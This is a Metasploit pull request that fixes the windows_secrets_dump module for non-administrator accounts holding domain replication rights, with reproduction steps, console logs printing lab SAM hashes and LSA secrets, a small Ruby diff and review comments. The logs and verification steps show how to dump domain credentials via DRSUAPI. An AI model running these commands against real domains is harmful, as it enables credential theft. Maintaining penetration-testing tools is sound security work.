### PR TITLE
Fix `gather/windows_secrets_dump` non-admin error

### LINKED ISSUE #16217: gather/windows_secrets_dump doesn't support only having 'Replicating Directory' 'Replicating Directory All' permissions
### Problem

A user with domain controller Replicating Directory/Replicating Directory All permissions, but not administrator access, cannot successfully run Metasploit's `gather/windows_secrets_dump` module against a target

## Steps to reproduce

Use Windows Server 2016

Create a new user account - without administrator access

Open active directory users and computers, enable advanced features:

image

Assign replication permissions to the new account

image

image

Running the metasploit module doesn't work:

```
msf6 auxiliary(gather/windows_secrets_dump) > run smb://replication_user:p4$$w0rd1@192.168.123.25
[*] Running module against 192.168.123.25

[!] 192.168.123.25:445 - Cannot find any active database. Extracted data will only be displayed here and NOT stored.
[-] 192.168.123.25:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 192.168.123.25:445 - Retrieving target system bootKey
[-] 192.168.123.25:445 - Error when getting BootKey: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa\JD: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[*] 192.168.123.25:445 - Cleaning up...
[-] 192.168.123.25:445 - Auxiliary aborted due to failure: unknown: Unable to get BootKey. If it is a Domain Controller, you can still try DOMAIN action since it does not need BootKey
[*] Auxiliary module execution completed
```

Running the impacket module does work:

```
msf6 auxiliary(scanner/smb/impacket/secretsdump) > run smb://replication_user:p4$$w0rd1@192.168.123.25

[*] Running for 192.168.123.25...
[-] 192.168.123.25 - RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] 192.168.123.25 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.123.25 - Using the DRSUAPI method to get NTDS.DIT secrets
[+] Administrator:500:aad3b43etc...
[*] 192.168.123.25 - Kerberos keys grabbed
[+] krbtgt:aes256-cts-hmac-sha1-96...etc..
[+] adf3.local\fake_mysql:aes1...etc...
[+] adf3.local\replication_user:aes128-cts...etc...
[*] 192.168.123.25 - Cleaning up... 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Note**: If we explicitly grant admin access, things do work:

```
msf6 auxiliary(gather/windows_secrets_dump) > run smb://replication_user:p4$$w0rd1@192.168.123.25
[*] Running module against 192.168.123.25

[!] 192.168.123.25:445 - Cannot find any active database. Extracted data will only be displayed here and NOT stored.
[*] 192.168.123.25:445 - Service RemoteRegistry is already running
[*] 192.168.123.25:445 - Retrieving target system bootKey
[+] 192.168.123.25:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04
[*] 192.168.123.25:445 - Saving remote SAM database
[*] 192.168.123.25:445 - Dumping SAM hashes
[*] 192.168.123.25:445 - Password hints:
No users with password hints on this system
[*] 192.168.123.25:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] 192.168.123.25:445 - Saving remote SECURITY database
[*] 192.168.123.25:445 - Decrypting LSA Key
[*] 192.168.123.25:445 - Dumping LSA Secrets
$MACHINE.ACC
ADF3\DC3$:plain_password_hex:3e0434cd2c48da85869aabda9c75ef70734472c7b2cacab7d5c3186c87085898bb204761f844f6ac5d91709445683219740e738e5c2ac2584a215ea6e37ae9eb849551c7863151432433ffd4f8531b92e5954297c900a321b046d6c
...etc...
```

### Were you following a specific guide/tutorial or reading documentation?

https://www.youtube.com/watch?v=QfyZQDyeXjQ

### Metasploit version

```
msf6 auxiliary(gather/windows_secrets_dump) > version
Framework: 6.1.30-dev-10f34d13e7
Console  : 6.1.30-dev-10f34d13e7
```

### PR DESCRIPTION
**Pull request by cdelafuente-r7**
This fixes #16217

The `gather/windows_secrets_dump` module is failing when the user is not an administrator (see #16217). Access denied errors are expected, but this should not entirely fail the execution if the ACTION is set to ALL or DOMAIN. The DOMAIN action uses the DRSUAPI method and it should not be affected by these permission issues if the user is allowed to perform replication (e.g. a user with domain controller Replicating Directory/Replicating Directory All permissions).

This fixes this by continuing the execution if the ACTION is ALL, since the DRSUAPI method will be tried.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/gather/windows_secrets_dump`
- [ ] `set ACTION ALL`
- [ ] `run verbose=true rhosts=<target IP> SMBUser=<non admin user> SMBPass=<password> SMBDomain=<domain>`
- [ ] **Verify** warning messages about permission issues are displayed 
- [ ] **Verify** the execution does not fail

## Example output

Using a Domain Controller computer account (can do replication but is not an admin)

### Before the fix
```
msf6 auxiliary(gather/windows_secrets_dump) > set ACTION ALL
ACTION => ALL
msf6 auxiliary(gather/windows_secrets_dump) > run verbose=true rhosts=10.0.0.23 SMBUser=DC01$ SMBPass=aad3b435b51404eeaad3b435b51404ee:<redacted> SMBDomain=mylab.local
[*] Running module against 10.0.0.23

[*] 10.0.0.23:445 - Opening Service Control Manager
[*] 10.0.0.23:445 - Binding to \svcctl...
[+] 10.0.0.23:445 - Bound to \svcctl
[-] 10.0.0.23:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Cleaning up...
[-] 10.0.0.23:445 - Auxiliary aborted due to failure: unreachable: Error when connecting to 'winreg' interface ([RubySMB::Error::UnexpectedStatusCode] The server responded with an unexpected status code: STATUS_PIPE_NOT_AVAILABLE).If it is a Domain Controller, you can still try DOMAIN action since it does not need RemoteRegistry
[*] Auxiliary module execution completed
```

### After the fix

```
msf6 auxiliary(gather/windows_secrets_dump) > set ACTION ALL
ACTION => ALL
msf6 auxiliary(gather/windows_secrets_dump) > run verbose=true rhosts=10.0.0.23 SMBUser=DC01$ SMBPass=aad3b435b51404eeaad3b435b51404ee:<redacted> SMBDomain=mylab.local
[*] Running module against 10.0.0.23

[*] 10.0.0.23:445 - Opening Service Control Manager
[*] 10.0.0.23:445 - Binding to \svcctl...
[+] 10.0.0.23:445 - Bound to \svcctl
[!] 10.0.0.23:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Retrieving target system bootKey
[*] 10.0.0.23:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[!] 10.0.0.23:445 - Error when getting BootKey... skipping: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa\JD: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[!] 10.0.0.23:445 - Unable to get BootKey... skipping
[*] 10.0.0.23:445 - Checking NoLMHash policy
[!] 10.0.0.23:445 - An error occured when checking NoLMHash policy: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[*] 10.0.0.23:445 - Saving remote SAM database
[*] 10.0.0.23:445 - Create SAM key
[!] 10.0.0.23:445 - Error when getting SAM hive... skipping ([RubySMB::Dcerpc::Error::WinregError] Error returned when creating key SAM: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Saving remote SECURITY database
[*] 10.0.0.23:445 - Create SECURITY key
[!] 10.0.0.23:445 - Error when getting SECURITY hive... skipping ([RubySMB::Dcerpc::Error::WinregError] Error returned when creating key SECURITY: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 10.0.0.23:445 - Using the DRSUAPI method to get NTDS.DIT secrets
...
```

```
msf6 auxiliary(gather/windows_secrets_dump) > set ACTION DOMAIN
ACTION => DOMAIN
msf6 auxiliary(gather/windows_secrets_dump) > run verbose=true rhosts=10.0.0.23 SMBUser=DC01$ SMBPass=aad3b435b51404eeaad3b435b51404ee:<redacted> SMBDomain=mylab.local
[*] Running module against 10.0.0.23

[*] 10.0.0.23:445 - Opening Service Control Manager
[*] 10.0.0.23:445 - Binding to \svcctl...
[+] 10.0.0.23:445 - Bound to \svcctl
[!] 10.0.0.23:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Checking NoLMHash policy
[!] 10.0.0.23:445 - An error occured when checking NoLMHash policy: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[*] 10.0.0.23:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 10.0.0.23:445 - Using the DRSUAPI method to get NTDS.DIT secrets
...
```

```
msf6 auxiliary(gather/windows_secrets_dump) > set ACTION CACHE
ACTION => CACHE
msf6 auxiliary(gather/windows_secrets_dump) > run verbose=true rhosts=10.0.0.23 SMBUser=DC01$ SMBPass=aad3b435b51404eeaad3b435b51404ee:<redacted> SMBDomain=mylab.local
[*] Running module against 10.0.0.23

[*] 10.0.0.23:445 - Opening Service Control Manager
[*] 10.0.0.23:445 - Binding to \svcctl...
[+] 10.0.0.23:445 - Bound to \svcctl
[!] 10.0.0.23:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Retrieving target system bootKey
[*] 10.0.0.23:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[-] 10.0.0.23:445 - Error when getting BootKey: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa\JD: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[*] 10.0.0.23:445 - Cleaning up...
[-] 10.0.0.23:445 - Auxiliary aborted due to failure: unknown: Unable to get BootKey. If it is a Domain Controller, you can still try DOMAIN action since it does not need BootKey
[*] Auxiliary module execution completed
```

```
msf6 auxiliary(gather/windows_secrets_dump) > set ACTION LSA
ACTION => LSA
msf6 auxiliary(gather/windows_secrets_dump) > run verbose=true rhosts=10.0.0.23 SMBUser=DC01$ SMBPass=aad3b435b51404eeaad3b435b51404ee:<redacted> SMBDomain=mylab.local
[*] Running module against 10.0.0.23

[*] 10.0.0.23:445 - Opening Service Control Manager
[*] 10.0.0.23:445 - Binding to \svcctl...
[+] 10.0.0.23:445 - Bound to \svcctl
[!] 10.0.0.23:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Retrieving target system bootKey
[*] 10.0.0.23:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[-] 10.0.0.23:445 - Error when getting BootKey: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa\JD: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[*] 10.0.0.23:445 - Cleaning up...
[-] 10.0.0.23:445 - Auxiliary aborted due to failure: unknown: Unable to get BootKey. If it is a Domain Controller, you can still try DOMAIN action since it does not need BootKey
[*] Auxiliary module execution completed
```

```
msf6 auxiliary(gather/windows_secrets_dump) > set ACTION SAM
ACTION => SAM
msf6 auxiliary(gather/windows_secrets_dump) > run verbose=true rhosts=10.0.0.23 SMBUser=DC01$ SMBPass=aad3b435b51404eeaad3b435b51404ee:<redacted> SMBDomain=mylab.local
[*] Running module against 10.0.0.23

[*] 10.0.0.23:445 - Opening Service Control Manager
[*] 10.0.0.23:445 - Binding to \svcctl...
[+] 10.0.0.23:445 - Bound to \svcctl
[!] 10.0.0.23:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 10.0.0.23:445 - Retrieving target system bootKey
[*] 10.0.0.23:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[-] 10.0.0.23:445 - Error when getting BootKey: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa\JD: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[*] 10.0.0.23:445 - Cleaning up...
[-] 10.0.0.23:445 - Auxiliary aborted due to failure: unknown: Unable to get BootKey. If it is a Domain Controller, you can still try DOMAIN action since it does not need BootKey
[*] Auxiliary module execution completed
```

### CODE REVIEW

File: modules/auxiliary/gather/windows_secrets_dump.rb [hunk 1]
```diff
@@ -1015,30 +1005,40 @@ def run
...
+          print_warning("Error when getting BootKey... skipping: #{e}")
+        else
+          print_error("Error when getting BootKey: #{e}")
+        end
+      end
+      if boot_key.empty?
+        if action.name == 'ALL'
+          print_warning('Unable to get BootKey... skipping')
+        else
+          fail_with(Module::Failure::Unknown,
```
Comment (smcintyre-r7) [inline modules/auxiliary/gather/windows_secrets_dump.rb:1023]:
```suggestion
          fail_with(Module::Failure::NotFound,
```

NotFound might be more descriptive for this case.

**Comment by jheysel-r7** [comment]
Before:
```
msf6 auxiliary(gather/windows_secrets_dump) > run rhosts=172.16.199.131 SMBUser=msfuser SMBPass=notpassword SMBDomain=\\\\Desktop-8athh6o\\smb
[*] Running module against 172.16.199.131

[!] 172.16.199.131:445 - Cannot find any active database. Extracted data will only be displayed here and NOT stored.
[*] 172.16.199.131:445 - Opening Service Control Manager
[*] 172.16.199.131:445 - Binding to \svcctl...
[+] 172.16.199.131:445 - Bound to \svcctl
[-] 172.16.199.131:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 172.16.199.131:445 - Cleaning up...
[-] 172.16.199.131:445 - Auxiliary aborted due to failure: unreachable: Error when connecting to 'winreg' interface ([RubySMB::Error::UnexpectedStatusCode] The server responded with an unexpected status code: STATUS_OBJECT_NAME_NOT_FOUND).If it is a Domain Controller, you can still try DOMAIN action since it does not need RemoteRegistry
[*] Auxiliary module execution completed
```


After:
```
msf6 auxiliary(gather/windows_secrets_dump) > run rhosts=172.16.199.131 SMBUser=msfuser SMBPass=notpassword SMBDomain=\\\\Desktop-8athh6o\\smb
[*] Running module against 172.16.199.131

[!] 172.16.199.131:445 - Cannot find any active database. Extracted data will only be displayed here and NOT stored.
[!] 172.16.199.131:445 - Unable to connect to the remote Service Control Manager. It will fail if the 'RemoteRegistry' service is stopped or disabled ([RubySMB::Dcerpc::Error::SvcctlError] Error returned when opening Service Control Manager (SCM): (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 172.16.199.131:445 - Retrieving target system bootKey
[!] 172.16.199.131:445 - Error when getting BootKey... skipping: Error returned when opening subkey SYSTEM\CurrentControlSet\Control\Lsa\JD: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.
[!] 172.16.199.131:445 - Unable to get BootKey... skipping
[*] 172.16.199.131:445 - Saving remote SAM database
[!] 172.16.199.131:445 - Error when getting SAM hive... skipping ([RubySMB::Dcerpc::Error::WinregError] Error returned when creating key SAM: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 172.16.199.131:445 - Saving remote SECURITY database
[!] 172.16.199.131:445 - Error when getting SECURITY hive... skipping ([RubySMB::Dcerpc::Error::WinregError] Error returned when creating key SECURITY: (0x00000005) ERROR_ACCESS_DENIED: Access is denied.).
[*] 172.16.199.131:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 172.16.199.131:445 - Using the DRSUAPI method to get NTDS.DIT secrets
```

Nice fix @cdelafuente-r7! Changes look good to me and testing was as expected 👍

**Comment by jheysel-r7** [comment]
# Release Notes

The windows secrets dump module was failing early for non-administrative users. This fixes the issue so the module now throws warnings where it was previously failing early. Now the module can complete the DOMAIN action whereas before it was failing prior to reaching this point.
